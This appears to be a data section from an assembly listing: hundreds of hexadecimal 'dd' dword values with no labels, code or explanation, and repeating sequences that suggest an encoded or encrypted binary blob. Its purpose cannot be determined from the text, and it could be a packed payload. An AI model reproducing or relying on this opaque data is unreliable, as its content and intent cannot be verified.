dd 5743908h, 69F8986Ah, 0C943D4EDh, 31C14820h, 9015DA7Ch
dd 0F17D02F1h, 6BFC9551h, 0A970E8B1h, 58C4409h, 841D9C60h
dd 0DA70F9F3h, 2DCF6631h, 0ABBCC28Bh, 0E9B228F1h, 53D5873Eh
dd 8544B9AAh, 59B60ECh, 66F58070h, 0BD6EF5BEh, 25D9740Dh
dd 8915EA7Ch, 0CA8203E3h, 0A4E18045h, 0B241E48Bh, 9983D32h
dd 540C9549h, 0E56302C5h, 29CC43CCh, 932EE48Ah, 0D78F19EFh
dd 53EEA4ACh, 974FD9AFh, 0D8286BFh, 8410A75Eh, 0C75B06DCh
dd 0D7CF6731h, 7C21E23Eh, 0E9AFB4E0h, 50D59A40h, 9850B5B1h
dd 0F99E3DFEh, 450F9960h, 0B861272Ch, 29B85D12h, 8919BDA0h
dd 0E978070Ch, 57FC8451h, 0A950E795h, 11956809h, 4AFB8871h
dd 0D86100C5h, 0C4C16125h, 8519C2A1h, 0E9750ADCh, 6AE2A343h
dd 4441E0A5h, 0F8AE3D22h, 45F89561h, 0C75B00C8h, 2DCE4BCCh
dd 8D02B980h, 0D25C19E8h, 4EE09540h, 7450E7A1h, 0DB23DFEh
dd 69039968h, 0CF5B28BFh, 121C6231h, 892ED780h, 0CA8128EDh
dd 0A4E18045h, 965FE88Ah, 9B03511h, 67FBA63Ch, 246F07D1h
dd 16DF680Ah, 8930B591h, 0E77B26BCh, 69EF8751h, 985AF494h
dd 5A1462Fh, 692F9960h, 0D35508CFh, 18DA742Ah, 9A2CB5A9h
dd 0D39319E5h, 47E1A752h, 0B23BDDA0h, 33B062ECh, 4AFA995Ch
dd 246100C5h, 14DB680Ah, 760CC291h, 0D78117EBh, 4FDBA83Fh
dd 929CE2B1h, 13AE6400h
dd 58FF9960h, 0B86EFDE2h, 11B85521h, 761BC191h, 0D89AB4D5h
dd 38D58663h, 9635CAB1h, 109D4900h, 73F99949h, 0D67C0DBEh
dd 32F16020h, 881BB785h, 0D69007F1h, 58E38245h, 973AB5ABh
dd 0F6B06705h, 8403A265h, 0D73D27E3h, 18CE5520h, 87BCC481h
dd 0E98F23E8h, 4FDF833Fh, 0A79CE8B1h, 99A420Bh, 6BDCA86Fh
dd 0D35408D1h, 1DBE681Fh, 8919B58Ah, 0E781260Ch, 49EF5442h
dd 979CD8AAh, 997370Bh, 72153460h, 0D26EF9C0h, 30DF6831h
dd 0AC21C78Bh, 0F08022EDh, 52B55451h, 0B24ED9A0h, 9834811h
dd 72FB7760h, 0B85FF9CAh, 18EF5831h, 6421C88Dh, 0E99022C5h
dd 38E1823Eh, 0B241E48Bh, 1275942Dh, 720E9960h, 0B43B08D1h
dd 16F16231h, 0ADBCD588h, 0D68128EAh, 56F0794Ah, 8A40D5B1h
dd 0E4A14005h, 4532784Dh, 0F6AF1DDCh, 10D838EAh, 8B21E66Ch
dd 0D77B20CFh, 3DE19F51h, 0AB41C64Ch, 12A1442Bh, 49059947h
dd 0D67C15B4h, 19ED5B31h, 9A25C691h, 0E99120EDh, 0A4BD8C71h
dd 7743D97Eh, 5924811h, 4901A968h, 0A77C15B4h, 8CF779A5h
dd 64BCBC9Dh, 0D0D99C0Ch, 0A4D65790h, 746DF9A6h, 6F413E1Fh
dd 0B85784C8h, 0E45628DCh, 0A3EF46FDh, 0A4F144E1h, 1020370Ch
dd 7970E9BBh, 81FF48Ch, 7193D7E4h, 44F1E511h, 0D4EBC72Ch
dd 0D2B67426h, 3960A9FBh, 44E1B4CCh, 0A48CD8ABh, 0AC6CF44Ch
dd 0E43C3DAAh, 84F60807h, 0E456A0A7h, 0B41C7424h, 96BEBE6Ch
dd 5274B4E6h, 4EFC5445h, 746FC54Ch, 0B920297Bh, 3D2B344Ch
dd 0F9A8693Bh, 0A3A1740Ch, 0F137F080h, 49CC984h, 197960CFh
dd 445C044Ch, 1793E5EFh, 95706DBh, 243CC960h, 0E7B00349h
dd 9894146Ch, 8F0BB35Bh, 6431FC31h, 251B814Ch, 8C3C94CFh
dd 0E38B334Fh, 0F9C459A7h, 5399740Ch, 64BCF704h, 630BE664h
dd 0E081DFBBh, 0C99CB461h, 713748ACh, 84BF290Bh, 43897C2Ch
dd 8B97F39Bh, 0C11579Bh, 45CB40Ch, 9859D559h, 579CB436h
dd 52C121A5h, 35DC7479h, 0D44D25E0h, 394B45FDh, 64FC0988h
dd 6340B893h, 64315021h, 48DED14Ch, 0E41469ECh, 41DC348Ch
dd 1E3F81ADh, 0A3B6740Ch, 5EBAA9E9h, 0B6ACB4CCh, 0A42034E9h
dd 81FF466h, 69033AE8h, 841C4E40h, 0A9C3B469h, 0C4DC8E02h
dd 64D61450h, 57677B9h, 776B5546h, 23A0E71Bh, 0F8FC19E1h
dd 84D79CDCh, 54F7D42Ch, 0E0EC77F7h, 5E2E89E9h, 9ED7B4CCh
dd 0A4FC55A8h, 45947EC7h, 7C3F94ECh, 0FFCFFA7h, 0C5228767h
dd 0A6E37920h, 0E77E3F01h, 8FB3C353h, 0F077A7E0h, 8436C87Ch
dd 8396661Dh, 998CC9DBh, 68FFD4ECh, 18B1FFC8h, 4FBCD441h
dd 0BF63743h, 0A4D65BF3h, 7B15F424h, 0DE96D7EFh, 84D51C34h
dd 0E6F9D42Ch, 8D4A1E2Dh, 8D7F4481h, 0C452FA81h, 0AC8059ACh
dd 0B915B644h, 0E47C8A32h, 399F16E3h, 247CD444h, 0B19D51CCh
dd 64FC2F65h, 1A965187h, 407F546Ch, 539CFC70h, 0E43C0D70h
dd 8C78B58Ch, 0D87CD42Eh, 0C41D7824h, 0D451536Ch, 8F5CF421h
dd 8880E1B8h, 449CF550h, 8C3C3E1Ch, 84DC3490h, 245026E2h
dd 50B1F303h, 37BCD441h, 8F34145h, 55FC54ADh, 759EDE7Dh
dd 0E4949506h, 361C348Ch, 0F948693Bh, 49B2740Ch, 9407C802h
dd 5601CC0h, 0C3D354ACh, 467C18E0h, 592B94ECh, 841C6AA4h
dd 0B8BC59D5h, 0F430D7C2h, 641668E7h, 0BAB305BEh, 7938E9BBh
dd 0C965F48Ch, 1A0C49ACh, 99C8C9DBh, 0DBF9D4ECh, 2EF34610h
dd 0DB39ECB0h, 45CB510h, 4E3C4707h, 0EFCFCD3Ch, 148C641Ch
dd 362C843Ch, 0F960693Bh, 889D740Ch, 64BC1664h, 0C40285Bh
dd 7A04E9BBh, 236FF48Ch, 2472AC61h, 889E918Ch, 2EAA542Ch
dd 4FE27521h, 0A4D198E9h, 9165970Ch, 640C5421h, 7AEDF74Ch
dd 0A4C0E67Bh, 85EBBC8Bh, 0A87BD42Ch, 0C41C75BCh, 79E612ECh
dd 22DCFAFCh, 0A58063ACh, 0C49CF44Dh, 75B174BAh, 34CAB552h
dd 0B94322E5h, 8A5BFF0Eh, 4FFB15B2h, 476054Ah, 0C3CFAA5Dh
dd 849204C1h, 0A5676DECh, 84ABB98Bh, 0A9F9D42Ch, 0C4DC916Eh
dd 70141486h, 0B45CB40Ch, 9491135Fh, 619CB462h, 0E43C94E8h
dd 844BB98Bh, 75D5D42Ch, 451C74CCh, 0AD0EE43Ah, 0A9E1C3C2h
dd 27FC54ACh, 60F8FC12h, 5DC0A3E9h, 0A0DC348Ch, 90EF090Ch
dd 491BAED8h, 64BC14E8h, 243CC1A9h, 8529348Ch, 9950D9B3h
dd 0C46800FBh, 625DB061h, 0B854B43Bh, 45CD6920h, 3E2C177Ah
dd 0EC91E32Bh, 0A46B9BF2h, 3406254Bh, 7B3C94D3h, 0F98B86EEh
dd 243CC978h, 0F4ECB4DFh, 6D94E49Ch, 0C85CB40Ch, 50DA8B4Bh
dd 4440D5ABh, 0BA5C297Bh, 0C461344Ch, 6DAFCAC0h, 0DAD6F945h
dd 8C0D14ACh, 845CB60Ch, 54D2A55Dh, 5A80891Bh, 59B9942Ch
dd 841C4F8Fh, 0D8B5C7DCh, 0F5EE44FDh, 9051539Dh, 8B5CF421h
dd 196B38B0h, 445C2958h, 71BCD774h, 841C4963h, 0D7BF8D2Dh
dd 0FBF03A0Bh, 0A001E6ADh, 0D67F1DC9h, 4ADB874Bh, 0AD73D0A0h
dd 0FB9B380Ah, 591F905Fh, 0D26106BEh, 16C14A20h, 921BBD7Fh
dd 0D484F9B8h, 49EE8348h, 0A570F49Eh, 0F8A13BFEh, 580FA344h
dd 437CD62Ch, 0C41C749Ch, 932EC46Ch, 32791DD4h, 4BDF8645h
dd 9C3DE0ADh, 10AC82F5h, 4715828Ch, 0CA71B4E7h, 2CB66E30h
dd 99B6B783h, 24AEF9BFh, 742E4442h, 648D2461h, 0C45A74CAh
dd 53166196h, 0A9C22E5h, 18CE5D22h, 0C111E81h, 45CB40Ch
dd 0F859D559h, 0A9CB439h, 24514B71h, 0F98B348Ch, 243CC9A0h
dd 182BDC8Dh, 0EFCABE38h, 0C45104A1h, 8098ADACh, 0AA76E96Ah
dd 0E12B926Dh, 21595761h, 243CCAECh, 0FB1E6A47h, 0F161BAD1h
dd 0C44F1E91h, 1481E3ACh, 1E9CB45Fh, 70265A65h, 1587324Ah
dd 4FBB762Dh, 55A1010Fh, 94BCD461h, 1276B4E6h, 79A0E9BBh
dd 0A01FF48Ch, 0F9409CD0h, 84E01CA7h, 0EA4FD42Ch, 394B740Fh
dd 64FC09E4h, 6308FC64h, 0A403FCBBh, 8A6FF44Ch, 177B732Fh
dd 0C71338Ch, 4C7C1401h, 0A34BF0DDh, 3AFEA04h, 7D9B35Bh
dd 0CCFC949Fh, 449CF447h, 16816721h, 48BA669Fh, 437C20E8h
dd 4111041h, 64B63C6Ch, 0D793B40Ch, 52D5863Ch, 445DDAA0h
dd 2CD1D31Ch, 0DDC74A1h, 0E4B128B1h, 510D83CCh, 0A4C434E9h
dd 0CAE13D0Ch, 55FC9482h, 5928891Bh, 0CCF942Ch, 84DC3490h
dd 1CD949A9h, 51E5740Ch, 0A4F200B9h, 5A329C0Ch, 0EBE213BBh
dd 84A9DBD1h, 672CD3ECh, 44E99D31h, 99F9D42Ch, 0C4DC91F3h
dd 6516E89Ch, 0ECAEB4E6h, 24FC54AEh, 5A8C891Bh, 0A4C1942Ch
dd 11BEA936h, 0E4892EA9h, 0CAB646CCh, 612389E9h, 0BAB0B4CCh
dd 56CDA45Ch, 5A90891Bh, 8384942Ch, 44D26001h, 0F1019A2Ch
dd 0C41C34D4h, 64BC2004h, 0D3AF0B0Ch, 762F9F6Fh, 9058B86Ah
dd 60D1D3ECh, 0F7DC74A1h, 247CDBC4h, 89101CCh, 9DBCD454h
dd 19087189h, 5554546Ch, 2CCB7322h, 0E43C94E8h, 4D1A7D43h
dd 125019EAh, 0C4D84010h, 3948A9FBh, 44E1B4CCh, 0A563D8ABh
dd 0AC2FF44Ch, 0E43C94F1h, 7C5EE909h, 0B145D4ECh, 4128C59h
dd 0FAC63C6Ch, 0A1DFB35Bh, 0A4BC4A98h, 620034Ch, 653C94EDh
dd 84DDC4E8h, 2554282Ch, 0A31C74CDh, 0A4F150E1h, 7420350Ch
dd 54FC54ADh, 443648C7h, 0E0D1D31Eh, 9DC74A2h, 31712D6Ch
dd 0C42FFC24h, 0C051536Ch, 6F5CF421h, 4DA9D7CEh, 449CB439h
dd 69B97D01h, 841C5169h, 2C1193DCh, 491C34E2h, 3F40232Ch
dd 8F5CB40Dh, 0A477606Ch, 0C91B241Bh, 0E47CB105h, 9C19B9D2h
dd 0CE7DD4ECh, 2E1D5ECCh, 5851536Eh, 875CF422h, 28FB13B4h
dd 449CF53Eh, 9D1215Fh
dd 6EDC7479h, 434F261Ch, 4127841h, 737C996Ch, 45CA691h
dd 2AA9E1ACh, 0D59CB439h, 7EE8BCE4h, 0F8F433DBh, 0E27CD42Ch
dd 0D895DAE7h, 0D9ABE850h, 49CE974h, 0A190D129h, 450DF48Ch
dd 83263184h, 0A820BFDBh, 2CDC951Ch, 0C80038C7h, 6FB4342Dh
dd 0B454D8D0h, 0A4FC59C4h, 5A7A194Ch, 839394F4h, 44D18801h
dd 30C0572Ch, 0E4223B92h, 613DA9E9h, 476B4CCh, 0A4FC3544h
dd 236FC64Ch, 2472A461h, 0A808C18Ch, 99EB2B20h, 0C4DCA9F4h
dd 6EE41832h, 0B45C1ECCh, 196BA763h, 445C2A3Ch, 41B9BAEFh
dd 841C512Eh, 3054D4C6h, 0FB1C74CCh, 5451539Fh, 215CF422h
dd 0A4FC54A8h, 0D919C1A1h, 0E47C8A2Ah, 9C19C109h, 7297D4ECh
dd 0FAED7426h, 7051539Fh, 875CF422h, 93EA54B4h, 0D1CA7FBDh
dd 24726241h, 0D6D9E48Ch, 0C48C098Ah, 0A346ECA4h, 5B2EB5FBh
dd 0DBD9BD6Fh, 2F56FFADh, 0D1DA1F0Bh, 24726239h, 0B40278Ch
dd 0D7257F43h, 0DA1C099Bh, 0C13C14ACh, 49CC9E3h, 4C1688ADh
dd 449CE95Ch, 0B9E8297Bh, 215C344Ch, 243CCCE9h, 8B2D68CCh
dd 0A4C9BDF1h, 45CB40Ch, 71811AACh, 449CB454h, 832A6A85h
dd 461FBDBh, 247C1421h, 19C74CCh, 71BC182Eh, 0F23C0306h
dd 84DA834Bh, 0B07CDAABh, 0C5A13A05h, 58BC83ACh, 46101C5h
dd 27FC6320h, 8621C091h, 0E99015DEh, 84F6618Dh, 647C146Ch
dd 0F9AF742Bh, 5601A169h, 0B65DFB0Ch, 0E5BA5930h, 890E1E69h
dd 0D87A19E8h, 37EF7948h, 0AC7CEDA8h, 0FDAC440Dh, 68FA95ACh
dd 0B464F90Ch, 25D05731h, 44D8C88Ah, 0F27D28DFh, 4BDA7D50h
dd 51791456h, 0F89D6BE6h, 72F59C6Fh, 0D05DB4D3h, 25C09428h
dd 921DF475h, 0ED7AD4F0h, 90F07C53h, 963BDA6Ch, 0DAE3ACCh
dd 5700A271h, 0BB9C1D0Ch, 0DED05D2Dh, 8C131E69h, 248126F1h
dd 84E1864Dh, 7051E395h, 0DAE3ACCh, 5700A271h, 0D33FB4FBh
dd 0E4FD5929h, 8DDCC8A5h, 0ED90D4DFh, 841D7949h, 9783E885h
dd 0F89D40CCh, 8ED95571h, 0F3D00D49h, 0B48288E5h, 34839870h
dd 2BCDAE71h, 7E97AD63h, 0E9C64E6Fh, 0E9374E40h, 4F67DE15h
dd 0E4B326E4h, 41346DEh, 864581B3h, 0F4C2C8FFh, 79C136DBh
dd 73D213A1h, 4B3F6A44h, 80660F6Ah, 0D71BFD65h, 16377905h
dd 841A4D86h, 9648B760h, 0E6D82058h, 0FB2E07D9h, 0DEAFD5FAh
dd 0BC44E73Eh, 40859ECAh, 0C41C74CCh, 64BC146Ch, 45CB40Ch
dd 0A4FC54ACh, 449CF44Ch, 0E43C94ECh, 84DC348Ch, 8A2157CCh
dd 0C41C34D5h, 3D5679EFh, 135CB4CCh, 31109703h, 0DB9B0C7Fh
dd 943F9A27h, 0A8C07807h, 0B6781607h, 0CCDEAFB5h, 0A637287Fh
dd 109EDF00h, 7DA2E925h, 0C915F48Ch, 0E47C8D46h, 0C65F39E7h
dd 0C5C57604h, 4C1C788Eh, 0A4DE4BF1h, 4809C0Ch, 84D454ACh
dd 0D19CF44Ch, 245E7871h, 7CC58D8Ch, 64FFE0C0h, 0A353D6D0h
dd 0A4E5A2F1h, 3D13770Ch, 8673E1AFh, 34BFF48Ch, 7328447Bh
dd 8874B78Ch, 0A1F58A4Eh, 0C4DC96F0h, 78BC0EEFh, 74EDF11h
dd 7279643Eh, 8267CC18h, 0F83C8E6Fh, 0EFCE3390h, 146E932Fh
dd 0A34B4BA4h, 4F7AFFFBh, 0C4455E89h, 6FFFACACh, 0C91B3760h
dd 0E47C8D5Eh, 9D5AB9D3h, 247CD4ECh, 0E03474CCh, 0EFBC146Ch
dd 0C4454291h, 0BBF1FCACh, 3CB4731Bh, 673C94ECh, 44C5C219h
dd 2C71D42Ch, 0E67C1145h, 0E09714ACh, 1DDA415Bh, 333F546Ch
dd 848586D1h, 72D11DECh, 0ECDC7495h, 247CD42Fh, 4F5FBDDFh
dd 64BC94DFh, 71F4060Ch, 0A76B13BAh, 84859EC1h, 671297ECh
dd 93DC4056h, 247DDBB0h, 0B4C6F7CCh, 140236Ch, 8F5CB40Ch
dd 0CCCC606Eh, 23CB7204h, 0BDD619EFh, 0CADF344Ch, 0A4745EDCh
dd 0BDD07495h, 78DA4DECh, 55F7F40Fh, 25FD9C27h, 3EB532Dh
dd 2825159Bh, 59DC8048h, 6C972D48h, 0D346ED4Fh, 64BC8BEBh
dd 0DCDD1A0Ch, 0B32E47BAh, 449C9FD1h, 0BEBF6AECh, 0FE1A98Ch
dd 26D7E4E6h, 951F7E47h, 22E3C9Dh, 995FB35Bh, 0A4BC4D06h
dd 9CDC79E9h, 68C0A377h, 0E3DC348Ch, 0E4A53E81h, 0F93444CCh
dd 67AB53FAh, 0C4455E91h, 0E81E3ACh, 479CB455h, 678F78F0h
dd 0BFCF36CCh, 47744A2Bh, 0E455F4BEh, 48E0559Fh, 2868DD10h
dd 5F206085h, 0C5B55F8Ch, 3F13A377h, 5CAA8B9h, 0D2413C37h
dd 45126877h, 0C5E7EDF7h, 853A285Bh, 0F91E2AB7h, 0C582E8E8h
dd 1C152777h, 5EAA8DFh, 0DCD51137h, 4532689Fh, 49EBDAF7h
dd 855A286Dh, 892B44B7h, 23A2E82Dh, 24652661h, 55758F8Ch
dd 0E2EB933Bh, 0AD30B64Fh, 3AB520Bh, 876B54Fh, 0BA11FC54h
dd 0B914731Bh, 0E47C789Dh, 7CCDEC72h, 48BC762Eh, 2A3E76CFh
dd 9CC2BEC7h, 6311AE64h, 0AC3ED7BBh, 493645D3h, 7919BC14h
dd 0DE5C33DBh, 7477072Fh, 75A176FCh, 0CEBCD450h, 0EC76DB67h
dd 0BE7CBE54h, 0D4A4E94Fh, 79F9BCDDh, 854433DBh, 0A87CD42Ch
dd 7519687Eh, 0F76520Ch, 9C619F62h, 24FC54ACh, 70B56E7h
dd 0B8681169h, 993344Ch, 243CC8FDh, 441C74CCh, 846C1780h
dd 15E1ABA6h, 0A7FC9480h, 539DF44Ch, 0E43CCA70h, 0F31EC8Ch
dd 8F177C48h, 0DDB23145h, 0C6C14ACh, 89135FA6h, 0A4BC487Dh
dd 459CF44Ch, 0BDC61165h, 4F10344Ch, 0F8AD5943h, 0C41C740Ch
dd 8B64166Ch, 0D952B3F0h, 48E3CCB1h, 0AAF722C7h, 0A3C9434h
dd 14DFA827h, 0A9F33ED9h, 0C4DCA8DDh, 6CBC146Ch, 0C794194h
dd 0BB1289ACh, 849025D1h, 0E43C94ECh, 0C95FEC90h, 2970D424h
dd 9C39F754h, 0FBFB7F6Ch, 0C450E591h, 0A4FC57ACh, 0D4A0E84Ch
dd 6FD7FE85h, 44C5CA11h, 0FBB5F2Ch, 0A0D4FD84h, 38ED9903h
dd 45FB4CCh, 63F054ACh, 2340DBD4h, 62E91DC2h, 2FDC7495h
dd 0CB7CD474h, 4D841F30h, 0CFBC1452h, 630A7164h, 0CC1CC4BBh
dd 23CB700Bh, 3CA28D8Fh, 2F0249DBh, 99F73F9Dh, 0C4DCA8DDh
dd 26B36603h, 45CB40Fh, 1B546841h, 0D4CB731Ah, 80D5BCDBh
dd 1C0233DBh, 8F62E93Bh, 93971F3Dh, 3D4A99E7h, 4C37B4CCh
dd 0BB689C25h, 849025D1h, 0E43C98ECh, 1CEEA88Ch, 6CEA9405h
dd 84142C67h, 0BC571880h, 0EBF7ACE1h, 75810B07h, 4C9CB460h
dd 0F93C94ECh, 0B349B446h, 247C1400h, 0ED843520h, 6E75FD54h
dd 0C450DFB1h, 0A76014ACh, 58779946h, 34D7942Ch, 956DE1Dh
dd 243CC80Bh, 0CEDC2466h, 0A4F0FFF1h, 9C825E0Ch, 297311CEh
dd 445C285Dh, 0E43C94DCh, 4D4C3B60h, 0B924FA86h, 54775A98h
dd 24EF7E04h, 86C93DA7h, 0BBFC9475h, 849025D1h, 0E43C74ECh
dd 14D5A98Ch, 0D01DED4h, 6E1C34E0h, 243D8C92h, 184D3963h
dd 0A4BC546Ch, 4750F44Ch, 0EE54D86Ch, 44D05D31h, 0AD17FA2Ch
dd 405FA59h, 0E9B37F6Ch, 49CE81Dh, 64FC54ACh, 740CFDA1h
dd 0B85519EEh, 0DB36344Ch, 0E4B0C5B1h, 0C41CF4CCh, 0B4B7C96Ch
dd 2EE1BE94h, 0EFC9480h, 0DC423127h, 6933ACBDh, 841C689Dh
dd 247CD52Ch, 0ED8C7620h, 38D67966h, 681CB4CCh, 8EA15EAFh
dd 0AA9CB460h, 65E43A47h, 95612BDCh, 247C1400h, 191C74CEh
dd 6E74886Eh, 0C450DEB1h, 2D977AACh, 848596D9h, 0C8680CECh
dd 0DB37348Ch, 0E4B0C5B1h, 0C41C7CCCh, 0FB18C86Ch, 0C450E591h
dd 0A40054ACh, 0D497E94Ch, 0CFC19E34h, 2EDC74A0h, 0A9F32147h
dd 0C4DCA8DDh, 64BC1C6Ch, 9C82C5E1h, 9F6F42Fh, 445C2867h
dd 0A46FFF12h, 6AF11F26h, 2E84BD74h, 4109F71h, 67A0546Ch
dd 18375906h, 0FE2546Ch, 588D7923h, 0D43C942Ch, 1C02348Ch
dd 277094ADh, 0CE14B84Ch, 0A4F0FFD1h, 13B71A0Ch, 781BD902h
dd 1BF7F48Ch, 24708571h
dd 84DC348Ch, 747508ECh, 0EDA176FCh, 0CEBCD440h, 184D3963h
dd 84FC546Ch, 0CA0CF44Ch, 0E8409601h, 0E8A8309h, 0E4B0BD91h
dd 4E99FDCCh, 8ABCD435h, 90834A7h, 0A4AC5B41h, 84CBC3CCh
dd 0B5C1CB46h, 84DC74A0h, 0CA7CD4ECh, 190D5A54h, 8AD5886Eh
dd 0E6464A7h, 64303F31h, 47BC344Ch, 7BB40446h, 44D06511h
dd 24FCD42Ch, 541E69CCh, 4D619EF2h, 0EA5CF420h, 0A968D407h
dd 440CFBA1h, 242B636Ch, 95612B26h, 247C1400h, 191C75CCh
dd 6EFC8467h, 0C450DD91h, 0B357BEACh, 41FACB2h, 0B855F9E6h
dd 2F02344Ch, 3B16D57Ch, 410A551h, 66BC146Ch, 5B3B290Ch
dd 64304531h, 489CF44Ch, 344649ECh, 0AF613ECCh, 0AE7C1400h
dd 410A471h, 549C556Ch, 85826CF2h, 0CFFCC407h, 4E5CA444h
dd 24707F71h, 993DE8Ch, 243CC8FDh, 0C41474CCh, 0BC222481h
dd 0A9569C8Fh, 0A4BC4886h, 450C9FB2h, 2CEC9C87h, 98B6B986h
dd 3B16D4ECh, 410A551h, 54BC146Ch, 0D991650Ch, 27A47A91h
dd 6E01FE14h, 0A3C54C0h, 2E9C6727h, 0FDF65105h, 4953740Ch
dd 64FC083Dh, 43CB40Ch, 3BAD7341h, 0DC420F27h, 4936ACE5h
dd 841C68A6h, 2E7F786Ch, 4109E71h, 4D57BA6Ch, 0C4453E99h
dd 2E3DDEACh, 84857EF1h, 34D73AECh, 0AD613634h, 8E7C1400h
dd 0D80DF9A3h, 64BF14ACh, 885BB50Ch, 0A4FC5433h, 0CF40DBD4h
dd 0B5B91FD2h, 5DC74A0h, 247CD43Dh, 0C45DEBCEh, 79BF146Ch
dd 0E8836C11h, 0FC974233h, 449CF44Ch, 0EAB1FF12h, 0E957EC72h
dd 0C8243FD2h, 6F220333h, 0CF22543Fh, 184D3963h, 0A4FC546Ch
dd 8451F54Ch, 0B86D1983h, 84DC344Ch, 0A70DC2Ch, 30992C32h
dd 38ED9903h, 45CB4CCh, 19FB56ACh, 0AABDFE0Dh, 0F9F51847h
dd 0A8449A84h, 4F17FA30h, 6E1424BFh, 0BC222207h, 895E11B4h
dd 0A4BC4887h, 47B79FB2h, 7BD6DD3Ch, 44D06511h, 247CD42Ch
dd 54FC684Ch, 4D41FE73h, 455CF420h, 2DF96ECCh, 469C1844h
dd 24707D51h, 8780F48Ch, 8F8098ACh, 2A76555Ch, 6E9C53B4h
dd 0C450DDB1h, 0BB977AACh, 849025D1h, 0E43C74ECh, 0DB2FA88Ch
dd 0E4B0C5B1h, 0C41C74CCh, 0FBB9C84Ch, 45CB753h, 0F40188ACh
dd 17B79EBCh, 71B7DB67h, 841C6D0Eh, 0E5F59507h, 0CEE42498h
dd 0A4F0FDF1h, 89135E0Ch, 0A4BC487Dh, 445CF44Ch, 3CA2A000h
dd 9D6F73Ch, 243CC805h, 5CC27EA7h, 0C9B634FBh, 49CE825h
dd 2973BF52h, 445C285Dh, 0E53C94EFh, 993A760h, 243CC8FDh
dd 0E41C74CCh, 2BB32180h, 45CB40Fh, 14AC5940h, 0CFCF5FE6h
dd 5EC11FABh, 0AFDC7495h, 40345D64h, 4953BDDFh, 64FC083Dh
dd 4DCB40Ch, 29796241h, 445C2865h, 647C9C66h, 0DC0F37D5h
dd 0E8B9D8A9h, 851C84F0h, 0EF6C1C0Ch, 0EA6297A7h, 4A3C45F4h
dd 0D304DAE7h, 0E4E43C6Ch, 0E5DE348Ch, 8F443FD2h, 0CAD1BD51h
dd 24ED8C92h, 47CC5FF2h, 8081E106h, 1B9CB460h, 24708571h
dd 84DC348Ch, 0DB82091Ch, 0AFE4ECE7h, 4C0F9F55h, 3437AC27h
dd 7D9EE127h, 0B99DF48Ch, 0E47C8D6Eh, 48576D8Dh, 81F5D810h
dd 0C4DC8429h, 3D4291E7h, 8937B4CCh, 0A4BC4D2Eh, 588D7923h
dd 0E47C942Ch, 8610348Ch, 6617AC43h, 0FBF274D0h, 3D5A91EFh
dd 135CB4CCh, 0A4FD2D30h, 44995C4Ch, 297794ECh, 5021823Eh
dd 0E89AC6FFh, 0A31C4008h, 0A4F19CE1h, 0A2E13D0Ch, 57FC9475h
dd 4788CCC7h, 0CCAFD394h, 0ECD07707h, 43EB8A38h, 0DD820947h
dd 670714ACh, 89D5C0CEh, 0A4BC4DEEh, 0CD94B64Fh, 2465DA71h
dd 0AC0FBF8Ch, 24FC473Bh, 793474CCh, 0EFAB5302h, 0C4455A99h
dd 0ED54AAACh, 0CFCB7322h, 2465FA61h, 8C16BF8Ch, 0F781E2Fh
dd 0C935F78Ah, 651C9C6Bh, 885BB40Ch, 0A4FC5556h, 5DF6A94Fh
dd 393F942Ch, 841C6D5Eh, 33D4D088h, 0C41C1651h, 6802A16Ch
dd 1D8E3927h, 0AAFF546Ch, 1A225C7Ch, 41BFD37Bh, 841C6D32h
dd 0FF77092Ch, 471B8013h, 64BC1557h, 7945C067h, 0A4BC4D12h
dd 4599794Bh, 693F94ECh, 841C6D5Eh, 43A455D2h, 0A0A183F1h
dd 0EFBC146Ch, 0C737B6CCh, 6D54A480h, 5DCB7322h, 2465FA39h
dd 0E861438Ch, 277CD42Ch, 4051E51h, 7641176Ch, 8F5CF415h
dd 0B0C33FACh, 44D9764Bh, 2B6794ECh, 0C85F4384h, 0A77CD42Ch
dd 0B1F768Ch, 76411760h, 0B65CF415h, 2B1135Ch, 239CB455h
dd 24715C61h, 0C4618E8Ch, 2433592Bh, 403574CCh, 40BC146Ch
dd 78E1C35Bh, 24FC54ACh, 0C99B095Ah, 0E43C9467h, 0AFDD7A07h
dd 4C4CC8EFh, 0A34BE974h, 3D629135h, 0DB91B4CCh, 7D96D9AFh
dd 0C99FF48Ch, 0E47C8DFEh, 9D96B905h, 24F7D4ECh, 0DD5EF9D7h
dd 6C2E14ACh, 1D223917h, 4DEE546Ch, 449CF459h, 8C7346FCh
dd 84DC347Bh, 0AFE822A9h, 0C71E9F8Dh, 0E9E724AEh, 49CED46h
dd 0E87F6041h, 0D38D733Ch, 5487830h, 139F4FE7h, 0E4A566B1h
dd 599754CCh, 64FC0D7Eh, 63122A64h, 0A49575BBh, 991CF44Ch
dd 0F0837FEAh, 4BC73D5Eh, 0FEE324h, 0D4BF39Bh, 26E996Bh
dd 20D7B35Bh, 75A3D590h, 239CF470h, 8FABD37Bh, 0A816B598h
dd 447CD4CCh, 4F5CA70Ah, 0E943F868h, 49CEDAAh, 8831CD29h
dd 0C99FF44Ch, 0E47C8DFEh, 5241D972h, 0E67F9A07h, 0D0DE9FC0h
dd 0CA7DA32h, 4AE3553h, 0A40154ACh, 8A15F44Ch, 0A78A7378h
dd 9C1AE909h, 4352D4ECh, 4117041h, 3A4976Ch, 4C7380Bh
dd 297554ACh, 445C2D7Eh, 83929406h, 44D1E801h, 33BC592Ch
dd 0C41C1850h, 947CFF6Ch, 0B45F1EBCh, 0A4D45546h, 7ADCF44Ch
dd 0B988297Bh, 0DC5F344Ch, 200E33Bh, 4D1C74D1h, 0A4E5EAF1h
dd 0BED9410Ch, 31FC9475h, 8485D6C1h, 0E8E65ECh, 0F98B848Ch
dd 243CC9B0h, 0D34BEC4Fh, 64C120F0h, 635C1E0Ch, 6425AA01h
dd 0C431734Ch, 673C54C1h, 8DB33D4h, 247CD841h, 0DDB6F945h
dd 2DEF14ACh, 0B4AD770Fh, 55007E5Dh, 5D72A91Bh, 592B942Ch
dd 841C696Ch, 0A87B94B1h, 0C41C787Dh, 0E9355D3Fh, 49CEDEAh
dd 4CCDA55Dh, 449BF43Bh, 44D1D31Ch, 9DC74A1h, 0AE00E36Ch
dd 4D1C74D0h, 0A4E5C6F1h, 51C4770Ch, 2FFC5445h, 0C9D32C87h
dd 0E47C88BDh, 74DC348Ch, 0A97FDAC1h, 0C4DC8429h, 25BF663Fh
dd 6513A563h, 7DE6D925h, 5F04F48Ch, 6F3C94D0h, 9DF7047h
dd 243CE4C9h, 851FC6DFh, 5B34503h, 1D923985h, 0B33F546Ch
dd 1DA2BFE3h, 17B9898Fh, 47534374h, 0EDCCD720h, 0C7F4B527h
dd 0A3E6951Ch, 5D7A1DE3h, 3E7F7140h, 244EF548h, 6F685F67h
